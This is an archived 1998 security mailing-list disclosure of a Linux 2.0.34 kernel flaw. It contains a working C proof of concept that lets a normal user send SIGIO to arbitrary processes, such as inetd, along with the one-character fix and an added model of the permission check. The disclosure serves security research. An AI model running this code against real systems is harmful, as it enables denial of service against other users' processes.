[ http://www.rootshell.com/ ]

Date: Tue, 30 Jun 1998 15:10:47 +0800
From: David Luyer <luyer@UCS.UWA.EDU.AU>
Subject: Serious Linux 2.0.34 security problem

I just saw this mentioned on linux-kernel and confirmed it;

#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int s, p;

    if (argc != 2) {
        fputs("Please specify a pid to send signal to.\n", stderr);
        exit(0);
    } else {
        p = atoi(argv[1]);
    }

    /* Name pid p as the owner of stdin, i.e. the recipient of SIGIO. */
    fcntl(0, F_SETOWN, p);

    /* Turn on O_ASYNC so that input on stdin raises SIGIO for the owner. */
    s = fcntl(0, F_GETFL, 0);
    fcntl(0, F_SETFL, s | O_ASYNC);
    printf("Sending SIGIO - press enter.\n");
    getchar();

    /* Restore the original file status flags. */
    fcntl(0, F_SETFL, s & ~O_ASYNC);
    printf("SIGIO send attempted.\n");
    return 0;
}

This can kill from a normal user account the inetd process under Linux 2.0.34
by sending a SIGIO. Very bad.

The fix is to invert !euid to euid in fs/fcntl.c:send_sigio(); line number is
approximately 139.

David.
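
Added example, not part of the original post and not the kernel's own code: a user-space model of the one-character fix described above, showing how the inverted test decides who may have SIGIO delivered. The struct layouts, function names and the uid-matching rule are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdio.h>

/* Constructed model of the credentials involved; field names are assumptions. */
struct owner  { unsigned uid, euid; };  /* process that called F_SETOWN */
struct target { unsigned uid, suid; };  /* process that would receive SIGIO */

/* True when none of the owner's ids match any of the target's ids. */
static bool no_uid_match(struct owner o, struct target t)
{
    return o.euid != t.suid && o.euid != t.uid &&
           o.uid  != t.suid && o.uid  != t.uid;
}

/* Inverted test (!euid): the mismatch check only applies to a root owner,
 * so an unprivileged owner is never refused. */
bool sigio_allowed_inverted(struct owner o, struct target t)
{
    if (!o.euid && no_uid_match(o, t))
        return false;
    return true;
}

/* Corrected test (euid): a non-root owner with no matching id is refused. */
bool sigio_allowed_fixed(struct owner o, struct target t)
{
    if (o.euid && no_uid_match(o, t))
        return false;
    return true;
}

int main(void)
{
    struct owner  user  = { 1000, 1000 };  /* constructed: normal user */
    struct target inetd = { 0, 0 };        /* constructed: root-owned daemon */
    struct target own   = { 1000, 1000 };  /* constructed: user's own process */

    printf("inverted, user -> inetd: %d\n", sigio_allowed_inverted(user, inetd));
    printf("fixed,    user -> inetd: %d\n", sigio_allowed_fixed(user, inetd));
    printf("fixed,    user -> own:   %d\n", sigio_allowed_fixed(user, own));
    return 0;
}
```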